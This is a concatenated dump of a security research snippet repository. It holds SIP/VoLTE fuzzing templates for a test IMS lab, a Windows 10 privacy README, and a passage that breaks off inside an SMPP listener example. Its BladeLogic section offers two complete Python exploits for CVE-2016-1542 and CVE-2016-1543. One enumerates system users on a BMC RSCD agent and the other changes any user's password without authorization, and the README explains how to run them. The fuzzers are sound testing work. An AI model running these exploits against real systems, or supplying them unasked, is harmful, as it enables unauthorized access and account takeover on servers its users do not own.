#P-Preferred-Identity: 129 | field("prefID", None, "P-Preferred-Identity", none), 130 | field("prefIDCol", 8, ":", none), 131 | field("prefIDblank", 8, " ", none), 132 | field("prefIDlt1", 8, "<", none), 133 | field("prefIDprot3", 24, "sip", none), 134 | field("prefIDsep6", 8, ":", none), 135 | field("prefIDImpuHost", None, impu_host, none), 136 | field("prefIDsep7", 8, "@", none), 137 | field("prefIDDomain", None, domain, std), 138 | field("prefIDgt1", 8, ">", none), 139 | field("prefIDcrlf", 16, "\x0d\x0a", none), 140 | #Privacy: none 141 | field("privacy", None, "Privacy", none), 142 | field("scolPrivacy", 8, ":", none), 143 | field("spacePrivacy", 8, " ", none), 144 | field("PrivacyNone", None, "none", none), 145 | field("crlfPrivacy", 16, "\x0d\x0a", none), 146 | #User-Agent: Cisco-SIPIPCommunicator/9.1.1 147 | field("name8", 80, "User-Agent", none), 148 | field("sep21", 8, ":", none), 149 | field("string", None, " Cisco-SIPIPCommunicator", none), 150 | field("sep22", 8, "/", none), 151 | field("version", None, "9.1.1", none), 152 | field("crlf10", 16, "\x0d\x0a", none), 153 | #P-Access-Network-Info: 3GPP-UTRAN-TDD; utran-cell-id-3gpp=00000000 154 | field("PAccess", None, "P-Access-Network-Info", none), 155 | field("scolPAccess", 8, ":", none), 156 | field("spacePAccess", 8, " ", none), 157 | field("PAccessValue", None, "3GPP-UTRAN-TDD", none), 158 | field("commPAccess", 8, ";", none), 159 | field("spacePAccess2", 8, " ", none), 160 | field("utranCell", None, "utran-cell-id-3gpp", none), 161 | field("equPAccess", 8, "=", none), 162 | field("utranValue", None, "00000000", none), 163 | field("crlfPAccess", 16, "\x0d\x0a", none), 164 | #Content-Length: 10 165 | field("ContLength", None, "Content-Length", none), 166 | field("sepContLen", 8, ":", none), 167 | field("blankContLen", 8, " ", none), 168 | list("Content-Length", "0", "dizzes/sip/integer.txt"), 169 | #field("Content-Length", None, "0", none), 170 | field("crlfContLen", 16, "\x0d\x0a", none), 171 | field("crlfLast", 16, "\x0d\x0a", none), 172 | #Message 173 | field("messageText", None, "Text Message", none) 174 | ] 175 | 176 | functions=[] 177 | -------------------------------------------------------------------------------- /VoLTE-dizzy/methods.txt: -------------------------------------------------------------------------------- 1 | REGISTER 2 | INVITE 3 | ACK 4 | CANCEL 5 | OPTIONS 6 | BYE 7 | REFER 8 | NOTIFY 9 | MESSAGE 10 | SUBSCRIBE 11 | INFO 12 | UPDATE 13 | register 14 | invite 15 | INVite 16 | REGISTeR 17 | INVITE! 18 | REGISTER; 19 | REGISTER0 20 | INVITE1 -------------------------------------------------------------------------------- /VoLTE-dizzy/register.dizz: -------------------------------------------------------------------------------- 1 | #SIP Register 2 | 3 | ip_src = "192.168.56.101" 4 | ip_dst = "192.168.56.102" 5 | port_src = "5060" 6 | port_dst = "4060" 7 | impu_host = "alice" 8 | impi_host = "alice" 9 | domain = "open-ims.test" 10 | 11 | name = "SIP Register" 12 | 13 | objects = [ 14 | #REGISTER sip:open-ims.test SIP/2.0 15 | list("Method", "REGISTER", "dizzes/sip/methods.txt"), 16 | field("blank1", 8, " ", none), 17 | field("prot1", 24, "sip", none), 18 | field("sep1",8, ":", none), 19 | field("reqURI", 104, domain,none), 20 | field("blank2", 8, " ", none), 21 | field("sip_version", 56, "SIP/2.0", none), 22 | field("crlf1",16, "\x0d\x0a", none), 23 | # Via: SIP/2.0/UDP 192.168.56.101:5060;branch=z9hG4bK41760951933bd19eaccc65c1e80dd321 24 | field("via", 24, "Via", none), 25 | field("sep2", 8, ":", none), 26 | field("blank3", 8, " ", none), 27 | field("prot2", 88, "SIP/2.0/UDP", none), 28 | field("blank4", 8, " ", none), 29 | list("ipViaList", ip_src, "dizzes/sip/faultyIP.txt"), 30 | field("separator3", 8, ":", none), 31 | field("port1", None, port_src, none), 32 | field("sep3", 8, ";", none), 33 | field("tag28", 48, "branch", none), 34 | field("equal1", 8, "=", none), 35 | field("branch" , None, "z9hG4bKnp151248737", std), 36 | field("crlf2", 16, "\x0d\x0a", none), 37 | # From: ;tag=1000 38 | field("name2", 32, "From", none), 39 | field("sep5", 8, ":", none), 40 | field("blank5", 8, " ", none), 41 | field("fromName", None, '"Alice"', none), 42 | field("blank51", 8, " ", none), 43 | field("lt1", 8, "<", none), 44 | field("prot3", 24, "sip", none), 45 | field("sep6", 8, ":", none), 46 | field("impuHost", None, impu_host, std), 47 | field("sep7", 8, "@", none), 48 | field("domain", None, domain, none), 49 | field("gt1", 8, ">", none), 50 | field("sep8", 8, ";", none), 51 | field("tag343", 24, "tag", none), 52 | field("equal8", 8, "=", none), 53 | field("tag2", None, "903df0a", std), 54 | field("crlf3", 16, "\x0d\x0a", none), 55 | # To: "Alice" 56 | field("name3",16, "To", none), 57 | field("sep9", 8, ":", none), 58 | field("blankTo", 8, " ", none), 59 | field("ToName", None, '"Alice"', none), 60 | field("blankTo1", 8, " ", none), 61 | field("lt2", 8, "<", none), 62 | field("prot4", 24, "sip", none), 63 | field("sep10", 8, ":", none), 64 | field("impuHost2", None, impu_host, none), 65 | field("sep11", 8, "@", none), 66 | field("domainTo", None, domain, none), 67 | field("gt2", 8, ">", none), 68 | field("crlf4", 16, "\x0d\x0a", none), 69 | # Call-ID: 0cc2f546f119c58fcdf0eaf43a6b7e01@192.168.56.101 70 | field("name4", 56, "Call-ID", none), 71 | field("sep12", 16, ": ", none), 72 | field("call_id", None, "0cc2f546f119c58fcdf0eaf43a6b7e01", std), 73 | field("crlf5", 16, "\x0d\x0a", none), 74 | # Max-Forwards: 70 75 | field("name5", 96, "Max-Forwards", none), 76 | field("sep13", 16, ": ", none), 77 | list("maxForwards", "70", "dizzes/sip/integer.txt"), 78 | field("crlf6", 16, "\x0d\x0a", none), 79 | # Date: Mon, 19 Sep 2015 08:22:57 GMT 80 | field("name6", 32, "Date", none), 81 | field("sep14", 8, ":", none), 82 | field("date", None, "Mon, 19 Sep 2015 08:22:57 GMT", none), 83 | field("crlf7", 16, "\x0d\x0a", none), 84 | # CSeq: 101 REGISTER 85 | field("name7", 32, "CSeq", none), 86 | field("sep15", 8, ":", none), 87 | field("blank6", 8, " ", none), 88 | list("CSeqNum", "101", "dizzes/sip/integer.txt"), 89 | field("blank7", 8, " ", none), 90 | list("method2", "REGISTER", "dizzes/sip/methods.txt"), 91 | field("crlf8", 16, "\x0d\x0a", none), 92 | # Contact: 93 | field("name9", 56, "Contact", none), 94 | field("sep16", 8, ":", none), 95 | field("blank8", 8, " ", none), 96 | field("lt3", 8, "<", none), 97 | field("prot5", 24, "sip", none), 98 | field("sep17", 8, ":", none), 99 | field("impuHostContact", None, impu_host, none), 100 | field("sep18", 8, "@", none), 101 | list("ipContList", ip_src, "dizzes/sip/faultyIP.txt"), 102 | field("sep19", 8, ":", none), 103 | list("contactPortList", port_src, "dizzes/sip/integer.txt"), 104 | field("sep20", 8, ";", none), 105 | field("tag3", None, "line", none), 106 | field("equal2", 8, "=", none), 107 | field("tag4", None, "9c7d2db8822013c", none), 108 | field("gt3", 8, ">", none), 109 | field("crlf9", 16, "\x0d\x0a", none), 110 | #Authorization: Digest username="alice@open-ims.test",realm="open-ims.test",nonce="",response="",uri="sip:open-ims.test" 111 | #algorithm=MD5,response="18e2ebf76671e63abb1c706d7a1b4f07",qop=auth-int,nc=00000001,cnonce="555650101551029857" 112 | field("authorization", None, "Authorization", none), 113 | field("scolAuth", 8, ":", none), 114 | field("spaceAuth", 8, " ", none), 115 | field("authMethod", None, "Digest", none), 116 | field("spaceeAuth", 8, " ", none), 117 | field("username", None, "username", none), 118 | field("equalsAuth", 8, "=", none), 119 | field("quoteAuth1", 8, '"', none), 120 | field("impiHostAuth", None, impi_host, std), 121 | field("atAuth", 8, "@", none), 122 | field("domainAuth", None, domain, none), 123 | field("quoteAuth2", 8, '"', none), 124 | field("commaAuth2", 8, ",", none), 125 | field("realm", None, "realm", none), 126 | field("equalAuth2", 8, "=", none), 127 | field("quoteAuth3", 8, '"', none), 128 | field("realmValue", None, domain, none), 129 | field("quoteAuth4", 8, '"', none), 130 | field("commaAuth3", 8, ",", none), 131 | field("nonce", None, "nonce", none), 132 | field("equalAuth3", 8, "=", none), 133 | field("quoteAuth5", 8, '"', none), 134 | field("nonceValue", None, "15f0c5d6969d36daa1c8eaddcf27db05", std), 135 | field("quoteAuth6", 8, '"', none), 136 | field("commaAuth4", 8, ",", none), 137 | field("authResponse", None, "response", none), 138 | field("equalAuth8", 8, "=", none), 139 | field("quoteAuth9", 8, '"', none), 140 | field("authResponseValue", None, "d1b41c044bfcffdec1db539a41470d77", none), 141 | field("quoteAuth10", 8, '"', none), 142 | field("commaAuth7", 8, ",", none), 143 | field("authURI", None, "uri", none), 144 | field("equalAuth4", 8, "=", none), 145 | field("quoteAuth7", 8, '"', none), 146 | field("authValue", None, "sip:"+domain, none), 147 | field("quoteAuth8", 8, '"', none), 148 | field("commaAuth5", 8, ",", none), 149 | field("authAlgorithm", None, "algorithm", none), 150 | field("equalAuth10", 8, "=", none), 151 | field("authAlgorithmValue", None, "MD5", none), 152 | field("commaAuth8", 8, ",", none), 153 | field("authQop", None, "qop", none), 154 | field("equalAuth5", 8, "=", none), 155 | field("authQopValue", None, "auth-int", none), 156 | field("commaAuth6", 8, ",", none), 157 | field("authnc", None, "nc", none), 158 | field("equalAuth6", 8, "=", none), 159 | field("authNCValue", None, "00000001", none), 160 | field("commaAuth61", 8, ",", none), 161 | field("authCnonce", None, "cnonce", none), 162 | field("equalAuth7", 8, "=", none), 163 | field("quoteAuth11", 8, '"', none), 164 | field("authCnonceValue", None, "6053256d", none), 165 | field("quoteAuth12", 8, '"', none), 166 | #field("authOpaque", None, "opaque", none), 167 | #field("equalAuth9", 8, "=", none), 168 | #field("authOpaqueValue", None, '"aW1zLmNvbS5jbg=="', none), 169 | #field("commaAuth9", 8, ",", none), 170 | field("crlfAuth", 16, "\x0d\x0a", none), 171 | # Expires: 3600 172 | field("nameEx", None, "Expires", none), 173 | field("sepSeEx", 8, ":", none), 174 | field("spaceSeEx", 8, " ", none), 175 | list("esExValue", "3600", "dizzes/sip/integer.txt"), 176 | field("crlfSeEx", 16, "\x0d\x0a", none), 177 | #Supported: path 178 | field("supported", None, "Supported", none), 179 | field("scolSupport", 8, ":", none), 180 | field("spaceSupport", 8, " ", none), 181 | field("supportedValue", None, "path", none), 182 | field("crlfSupported", 16, "\x0d\x0a", none), 183 | #P-Preferred-Identity: 184 | field("prefID", None, "P-Preferred-Identity", none), 185 | field("prefIDCol", 8, ":", none), 186 | field("prefIDblank", 8, " ", none), 187 | field("prefIDlt1", 8, "<", none), 188 | field("prefIDprot3", 24, "sip", none), 189 | field("prefIDsep6", 8, ":", none), 190 | field("prefIDImpuHost", None, impu_host, none), 191 | field("prefIDsep7", 8, "@", none), 192 | field("prefIDDomain", None, domain, std), 193 | field("prefIDgt1", 8, ">", none), 194 | field("prefIDcrlf", 16, "\x0d\x0a", none), 195 | #User-Agent: Cisco-SIPIPCommunicator/9.1.1 196 | field("name8", 80, "User-Agent", none), 197 | field("sep21", 8, ":", none), 198 | field("string", None, " Cisco-SIPIPCommunicator", none), 199 | field("sep22", 8, "/", none), 200 | field("version", None, "9.1.1", none), 201 | field("crlf10", 16, "\x0d\x0a", none), 202 | #Allow: INVITE,ACK,CANCEL,BYE,MESSAGE,NOTIFY 203 | field("allow", None, "Allow", none), 204 | field("sepAllow", 8, ":", none), 205 | field("blankAllow", 8, " ", none), 206 | field("methodsAllow", None, "INVITE,ACK,CANCEL,BYE,MESSAGE,NOTIFY", none), 207 | field("crlfAllowEvents", 16, "\x0d\x0a", none), 208 | #P-Access-Network-Info: 3GPP-UTRAN-TDD; utran-cell-id-3gpp=00000000 209 | field("PAccess", None, "P-Access-Network-Info", none), 210 | field("scolPAccess", 8, ":", none), 211 | field("spacePAccess", 8, " ", none), 212 | field("PAccessValue", None, "3GPP-UTRAN-TDD", none), 213 | field("commPAccess", 8, ";", none), 214 | field("spacePAccess2", 8, " ", none), 215 | field("utranCell", None, "utran-cell-id-3gpp", none), 216 | field("equPAccess", 8, "=", none), 217 | field("utranValue", None, "00000000", none), 218 | field("crlfPAccess", 16, "\x0d\x0a", none), 219 | #Privacy: none 220 | field("privacy", None, "Privacy", none), 221 | field("scolPrivacy", 8, ":", none), 222 | field("spacePrivacy", 8, " ", none), 223 | field("PrivacyNone", None, "none", none), 224 | field("crlfPrivacy", 16, "\x0d\x0a", none), 225 | #Content-Length: 0 226 | field("ContLength", None, "Content-Length", none), 227 | field("sepContLen", 8, ":", none), 228 | field("blankContLen", 8, " ", none), 229 | list("Content-Length", "0", "dizzes/sip/integer.txt"), 230 | #field("Content-Length", none, "0", none), 231 | field("crlfContLen", 16, "\x0d\x0a", none), 232 | # Close Header with CRLF 233 | field("crlf11", 16, "\x0d\x0a", none), 234 | ] 235 | 236 | functions=[] 237 | -------------------------------------------------------------------------------- /VoLTE-dizzy/subscribe.dizz: -------------------------------------------------------------------------------- 1 | #SIP Subscribe 2 | 3 | ip_src = "192.168.56.101" 4 | ip_dst = "192.168.56.103" 5 | port_src = "5061" 6 | port_dst = "4060" 7 | impu_host = "alice" 8 | domain = "open-ims.test" 9 | 10 | name = "SIP Subscribe" 11 | 12 | objects = [ 13 | #SUBSCRIBE sip:alice@open-ims.test SIP/2.0 14 | list("Method", "SUBSCRIBE", "dizzes/sip/methods.txt"), 15 | #field("Method", None, "SUBSCRIBE", none), 16 | field("blank1", 8, " ", none), 17 | field("prot1", 24, "sip", none), 18 | field("sep1",8, ":", none), 19 | field("reqHost",None, impu_host, none), 20 | field("reqAt",8, "@", none), 21 | field("reqURI",104,domain,none), 22 | field("blank2", 8, " ", none), 23 | field("sip_version", 56, "SIP/2.0", none), 24 | field("crlf1",16, "\x0d\x0a", none), 25 | # Call-ID: 661ad2611d7898d6cc7dd31a9d9cb2ed@127.0.0.1 26 | field("nameCID", 56, "Call-ID", none), 27 | field("sepCID", 16, ": ", none), 28 | field("CallID", None, "0cc2f546f119c58fcdf0eaf43a6b7e01", none), 29 | #field("separator12", 8, "@", none), 30 | #field("call_id2", None, ip_src, none), 31 | field("crlf5", 16, "\x0d\x0a", none), 32 | # CSeq: 101 SUBSCRIBE 33 | field("nameCSeq", 32, "CSeq", none), 34 | field("sepCSeq", 8, ":", none), 35 | field("blankCSeq", 8, " ", none), 36 | list("CSeqNum", "101", "dizzes/sip/integer.txt"), 37 | # field("CSeqNumField", None, "1", none), 38 | field("blankCSeq2", 8, " ", none), 39 | list("methodCSeq", "SUBSCRIBE", "dizzes/sip/methods.txt"), 40 | field("crlf8", 16, "\x0d\x0a", none), 41 | # Via: SIP/2.0/UDP 192.168.56.101:5060;branch=z9hG4bK41760951933bd19eaccc65c1e80dd321 42 | field("via", 24, "Via", none), 43 | field("sep2", 8, ":", none), 44 | field("blank3", 8, " ", none), 45 | field("prot2", 88, "SIP/2.0/UDP", none), 46 | field("blank4", 8, " ", none), 47 | #field("ipVia", len(ip_src)*8, ip_src, none), 48 | list("ipViaList", ip_src, "dizzes/sip/faultyIP.txt"), 49 | field("separator3", 8, ":", none), 50 | field("port1", None, port_src, none), 51 | field("sep3", 8, ";", none), 52 | field("tag28", 48, "branch", none), 53 | field("equal1", 8, "=", none), 54 | field("branch", None, "z9hG4bKnp151248737", none), 55 | field("crlf2", 16, "\x0d\x0a", none), 56 | # From: ;tag=1000 57 | field("name2", 32, "From", none), 58 | field("sep5", 8, ":", none), 59 | field("blank5", 8, " ", none), 60 | field("fromName", None, '"Alice"', none), 61 | field("blank51", 8, " ", none), 62 | field("lt1", 8, "<", none), 63 | field("prot3", 24, "sip", none), 64 | field("sep6", 8, ":", none), 65 | field("impuHost", None, impu_host, none), 66 | field("sep7", 8, "@", none), 67 | field("domain", None, domain, none), 68 | field("gt1", 8, ">", none), 69 | field("sep8", 8, ";", none), 70 | field("tag343", 24, "tag", none), 71 | field("equal8", 8, "=", none), 72 | field("tag2", None, "903df0a", none), 73 | field("crlf3", 16, "\x0d\x0a", none), 74 | # To: "Alice" 75 | field("name3",16, "To", none), 76 | field("sep9", 8, ":", none), 77 | field("blankTo", 8, " ", none), 78 | field("ToName", None, '"Alice"', none), 79 | field("blankTo1", 8, " ", none), 80 | field("lt2", 8, "<", none), 81 | field("prot4", 24, "sip", none), 82 | field("sep10", 8, ":", none), 83 | field("impuHost2", None, impu_host, none), 84 | field("sep11", 8, "@", none), 85 | field("domainTo", None, domain, none), 86 | field("gt2", 8, ">", none), 87 | field("crlf4", 16, "\x0d\x0a", none), 88 | # Max-Forwards: 70 89 | field("name5", 96, "Max-Forwards", none), 90 | field("sep13", 16, ": ", none), 91 | list("maxForwards", "70", "dizzes/sip/integer.txt"), 92 | #field("max_forwards", None, "70", std), 93 | field("crlf6", 16, "\x0d\x0a", none), 94 | # Route: 95 | field("nameRoute", 40, "Route", none), 96 | field("sepR1", 8, ":", none), 97 | field("blankR1", 8, " ", none), 98 | field("ltR1", 8, "<", none), 99 | field("protR1", 24, "sip", none), 100 | field("sepR2", 8, ":", none), 101 | field("theWholeRoute",None,"orig@scscf.open-ims.test",std), 102 | field("sepR3", 8, ":", none), 103 | list("portR2", "6060", "dizzes/sip/integer.txt"), 104 | field("sepR5", 8, ";", none), 105 | field("lr", 16, "lr", none), 106 | field("gtR3", 8, ">", none), 107 | field("crlfRoute", 16, "\x0d\x0a", none), 108 | # Contact: 109 | field("name9", 56, "Contact", none), 110 | field("sep16", 8, ":", none), 111 | field("blank8", 8, " ", none), 112 | field("lt3", 8, "<", none), 113 | field("prot5", 24, "sip", none), 114 | field("sep17", 8, ":", none), 115 | field("impuHostContact", None, impu_host, none), 116 | field("sep18", 8, "@", none), 117 | list("ipContList", ip_src, "dizzes/sip/faultyIP.txt"), 118 | #field("ip_gw3", len(ip_src)*8, ip_src, none), 119 | field("sep19", 8, ":", none), 120 | list("contactPortList", port_src, "dizzes/sip/integer.txt"), 121 | field("gt3", 8, ">", none), 122 | field("crlf9", 16, "\x0d\x0a", none), 123 | # Expires: 600 124 | field("nameEx", None, "Expires", none), 125 | field("sepSeEx", 8, ":", none), 126 | field("spaceSeEx", 8, " ", none), 127 | list("esExValue", "600", "dizzes/sip/integer.txt"), 128 | field("crlfSeEx", 16, "\x0d\x0a", none), 129 | # Accept: application/pidf+xml 130 | field("accept", None, "Accept", none), 131 | field("scolAccept", 8, ":", none), 132 | field("spaceAccept", 8, " ", none), 133 | field("AcceptValue", None, "application/pidf+xml", std), 134 | field("crlfAccept", 16, "\x0d\x0a", none), 135 | # Event: reg 136 | field("event", None, "Event", none), 137 | field("eventCol", 8, ":", none), 138 | field("eventblank", 8, " ", none), 139 | field("eventType", None, "reg", std), 140 | field("prefIDcrlf", 16, "\x0d\x0a", none), 141 | #User-Agent: Cisco-SIPIPCommunicator/9.1.1 142 | field("name8", 80, "User-Agent", none), 143 | field("sep21", 8, ":", none), 144 | field("string", None, " Cisco-SIPIPCommunicator", none), 145 | field("sep22", 8, "/", none), 146 | field("version", None, "9.1.1", none), 147 | field("crlf10", 16, "\x0d\x0a", none), 148 | #Content-Length: 0 149 | field("ContLength", None, "Content-Length", none), 150 | field("sepContLen", 8, ":", none), 151 | field("blankContLen", 8, " ", none), 152 | list("Content-Length", "0", "dizzes/sip/integer.txt"), 153 | #field("Content-Length", None, "0", none), 154 | field("crlfContLen", 16, "\x0d\x0a", none), 155 | # Close Header with CRLF 156 | field("crlf11", 16, "\x0d\x0a", none), 157 | ] 158 | 159 | functions=[] 160 | -------------------------------------------------------------------------------- /Win10-privacy/README.md: -------------------------------------------------------------------------------- 1 | This sheet presents suggestions regarding Microsoft Windows 10 privacy settings via Active Directory Group Policies and gives information about the corresponding Windows Registry keys. For more information on the impact of the default configuration and a detailed explanation of our recommendations refer to the [ERNW Newsletter 52](https://www.ernw.de/newsletter/newsletter-52-february-2016-some-recommendations-regarding-windows-10-privacy-settings/). 2 | -------------------------------------------------------------------------------- /Win10-privacy/Win10_Recommendation_1.0.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ernw/insinuator-snippets/837feffb79db74cc1566541c3373db315e817ba0/Win10-privacy/Win10_Recommendation_1.0.xlsx -------------------------------------------------------------------------------- /bmc_bladelogic/README.md: -------------------------------------------------------------------------------- 1 | The scripts are used to exploit CVE-2016-1542 (BMC-2015-0010) and CVE-2016-1543 (BMC-2015-0011) vulnerabilities in BMC BladeLogic RSCD agent. The detailed information can be found here: https://www.insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/ 2 | Use getUsers.py for user enumeration, and changePwd.py to change their passwords. 3 | -------------------------------------------------------------------------------- /bmc_bladelogic/changePwd.py: -------------------------------------------------------------------------------- 1 | # Demonstration of the unauthorized password change functionality with BMC BladeLogic RSCD agent v8.6.01.66 2 | # Copyright: ERNW 3 | 4 | 5 | import socket 6 | import ssl 7 | import sys 8 | import argparse 9 | import requests 10 | from requests.packages.urllib3 import PoolManager, HTTPConnectionPool 11 | #If you encounter problems with import, try to comment the previous line and use the following one instead 12 | #from urllib3 import PoolManager, HTTPConnectionPool, connectionpool 13 | 14 | try: 15 | from http.client import HTTPConnection 16 | except ImportError: 17 | from httplib import HTTPConnection 18 | 19 | class MyHTTPConnection(HTTPConnection): 20 | def connect(self): 21 | self.sock = wrappedSocket 22 | if self._tunnel_host: 23 | self._tunnel() 24 | 25 | requests.packages.urllib3.connectionpool.HTTPConnection = MyHTTPConnection 26 | #If you used the alternative import, comment the previous line and uncomment the following instead 27 | #connectionpool.HTTPConnection = MyHTTPConnection 28 | 29 | def optParser(): 30 | parser = argparse.ArgumentParser(description="Test for password change with BMC BladeLogic Server Automation RSCD agent") 31 | parser.add_argument("host", help="IP address of a target system") 32 | parser.add_argument("-p", "--port", type=int, default=4750, help="TCP port (default: 4750)") 33 | parser.add_argument("user", help="User whom the password belongs to") 34 | parser.add_argument("password", help="New password") 35 | opts=parser.parse_args() 36 | return opts 37 | 38 | def sendXMLRPC(host,port,packet): 39 | r=requests.post('http://'+host+':'+str(port)+'/xmlrpc',data=packet) 40 | print r.status_code 41 | print r.content 42 | return 43 | 44 | # Server introduction request 45 | 46 | intro = """RemoteServer.intro2016-1-14-18-10-30-392095870;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;8.6.01.66""" 47 | options=optParser() 48 | user=options.user 49 | newPass=options.password 50 | PORT=options.port 51 | HOST=options.host 52 | 53 | # Request to update password of a specific user 54 | 55 | updatePwd = """DAAL.performActiontypeNameBMC_UnixUserhost0.0.0.0containerstringIS_LIVEvaluelongValue1kind1path/"""+str(user)+"""updatePasswordstringnewPasswordvaluestringValue"""+str(newPass)+"""kind20""" 56 | 57 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 58 | sock.connect((HOST, PORT)) 59 | 60 | # Initial packet which will trigger XMLRPC communication 61 | sock.sendall("TLSRPC") 62 | wrappedSocket = ssl.wrap_socket(sock) 63 | 64 | # Sending both XMLRPC requests 65 | # Important: response to the first request might be "No authorization to access host". 66 | # That does not mean that the second request will not work! 67 | # When the response to the second request is errorCode 0 - it worked 68 | 69 | sendXMLRPC(HOST,PORT,intro) 70 | sendXMLRPC(HOST,PORT,updatePwd) 71 | 72 | wrappedSocket.close() 73 | 74 | -------------------------------------------------------------------------------- /bmc_bladelogic/getUsers.py: -------------------------------------------------------------------------------- 1 | # Retrieving system users with BMC BladeLogic RSCD agent (checked for v8.6.01.66) 2 | # Copyright: ERNW 3 | 4 | import socket 5 | import ssl 6 | import sys 7 | import requests 8 | import argparse 9 | import xml.etree.ElementTree as ET 10 | from requests.packages.urllib3 import PoolManager, HTTPConnectionPool 11 | #If you encounter problems with import, try to comment the previous line and use the following one instead 12 | #from urllib3 import PoolManager, HTTPConnectionPool, connectionpool 13 | try: 14 | from http.client import HTTPConnection 15 | except ImportError: 16 | from httplib import HTTPConnection 17 | 18 | class MyHTTPConnection(HTTPConnection): 19 | def connect(self): 20 | self.sock = wrappedSocket 21 | if self._tunnel_host: 22 | self._tunnel() 23 | 24 | requests.packages.urllib3.connectionpool.HTTPConnection = MyHTTPConnection 25 | #If you used the alternative import, comment the previous line and uncomment the following instead 26 | #connectionpool.HTTPConnection = MyHTTPConnection 27 | 28 | def optParser(): 29 | parser = argparse.ArgumentParser(description="Retrieving system users with BMC BladeLogic Server Automation RSCD agent") 30 | parser.add_argument("host", help="IP address of a target system") 31 | parser.add_argument("-p", "--port", type=int, default=4750, help="TCP port (default: 4750)") 32 | opts=parser.parse_args() 33 | return opts 34 | 35 | # Server introduction request 36 | init = """RemoteServer.intro2015-11-19-16-10-30-392095870;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;8.6.01.66""" 37 | 38 | getVersion="""RemoteServer.getVersion""" 39 | 40 | getUsers="""DAAL.getAssetChildrenStreamtypeNameBMC_UnixUsershost0.0.0.0containerstringIS_LIVEvaluelongValue1kind1path/1""" 41 | 42 | getNext="""DAAL.assetStreamGetNextstreamIDsessionId2100""" 43 | 44 | closeAsset="""DAAL.assetStreamClosestreamIDsessionId2""" 45 | 46 | options=optParser() 47 | PORT=options.port 48 | HOST=options.host 49 | 50 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 51 | sock.connect((HOST, PORT)) 52 | 53 | # Initial packet which will trigger XMLRPC communication 54 | sock.sendall("TLSRPC") 55 | wrappedSocket = ssl.wrap_socket(sock) 56 | 57 | print "Sending intro..." 58 | r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=init) 59 | #print r.status_code 60 | r.content 61 | print "Getting version..." 62 | r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getVersion) 63 | #print r.status_code 64 | #print r.content 65 | rootVersion = ET.fromstring(r.content) 66 | print "=========================" 67 | print "Major version: " + rootVersion[0][0][0][0][0][1].text 68 | print "Minor version: " + rootVersion[0][0][0][0][1][1].text 69 | print "Patch version: " + rootVersion[0][0][0][0][2][1].text 70 | print "Platform version: " + rootVersion[0][0][0][0][3][1].text 71 | print "=========================\n" 72 | 73 | print "Sending request for users...\n" 74 | r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getUsers) 75 | #print r.status_code 76 | r.content 77 | r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getNext) 78 | #print r.status_code 79 | with open("./users.xml", "w") as text_file: 80 | text_file.write(r.content) 81 | 82 | r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getNext) 83 | #print r.status_code 84 | r.content 85 | r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=closeAsset) 86 | #print r.status_code 87 | r.content 88 | 89 | 90 | # Parsing the response 91 | # If parsing does not work correctly, the users' information still can be found in the saved users.xml file 92 | root = ET.parse('./users.xml').getroot() 93 | count=0 94 | ind=1 95 | while ind: 96 | try: 97 | ind=root[0][0][0][0][0][1][0][0][count][0][0][1][0][2][1].text 98 | except IndexError: 99 | pass 100 | break 101 | count+=1 102 | 103 | print "Number of users found: " + str(count) + "\n" 104 | 105 | for i in range(0,count): 106 | print "User " + str(i) + ": " + root[0][0][0][0][0][1][0][0][i][0][0][1][0][2][1].text + "\n........................" 107 | print "home directory:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][0][0][1][1][0][1][1].text 108 | print "uid:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][11][0][1][1][0][1][1][0].text 109 | print "gid:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][3][0][1][1][0][1][1][0].text 110 | print "primaryGroupName:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][4][0][1][1][0][1][1].text 111 | try: 112 | print "username:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][2][0][1][1][0][1][1].text 113 | except IndexError: 114 | pass 115 | try: 116 | print "shell:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][10][0][1][1][0][1][1].text 117 | except IndexError: 118 | pass 119 | print "........................\n" 120 | 121 | 122 | wrappedSocket.close() 123 | -------------------------------------------------------------------------------- /gsm_troopers/README.md: -------------------------------------------------------------------------------- 1 | Blog post: https://insinuator.net/2017/03/troopers17-gsm-network-how-about-your-own-smpp-service/ 2 | -------------------------------------------------------------------------------- /gsm_troopers/smpp_example_listener.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import logging 3 | import sys 4 | 5 | import smpplib.gsm 6 | import smpplib.client 7 | import smpplib.consts 8 | 9 | ############################################################################ 10 | # EXAMPLE SCRIPT FOR TROOPERS 2017 SMPP LISTENER # 11 | # www.troopers.de # 12 | # FOR QUESTIONS, PLS Contact Hendrik Schmidt, hschmidt@ernw.de # 13 | ############################################################################ 14 | 15 | _MYSERVICE="20001" #functional number of your service 16 | 17 | #Enable Logging 18 | logging.basicConfig(filename="YourESME.log",level='DEBUG') 19 | 20 | #YOUR CODE 21 | def handle_incoming_sms(pdu): 22 | logging.info(pdu.source_addr + " -> " + pdu.destination_addr + " send msg " + pdu.short_message) 23 | #YOUR CODE 24 | #... 25 | #... 26 | # Send SMS Back 27 | send_message(_MYSERVICE,pdu.source_addr,"Successfully received SMS with content " + pdu.short_message) 28 | 29 | 30 | 31 | ####################### 32 | def send_message(src,dest, string): 33 | parts, encoding_flag, msg_type_flag = smpplib.gsm.make_parts(string) 34 | 35 | logging.info('Sending SMS "%s" to %s' % (string, dest)) 36 | for part in parts: 37 | pdu = client.send_message( 38 | source_addr_ton=smpplib.consts.SMPP_TON_INTL, 39 | 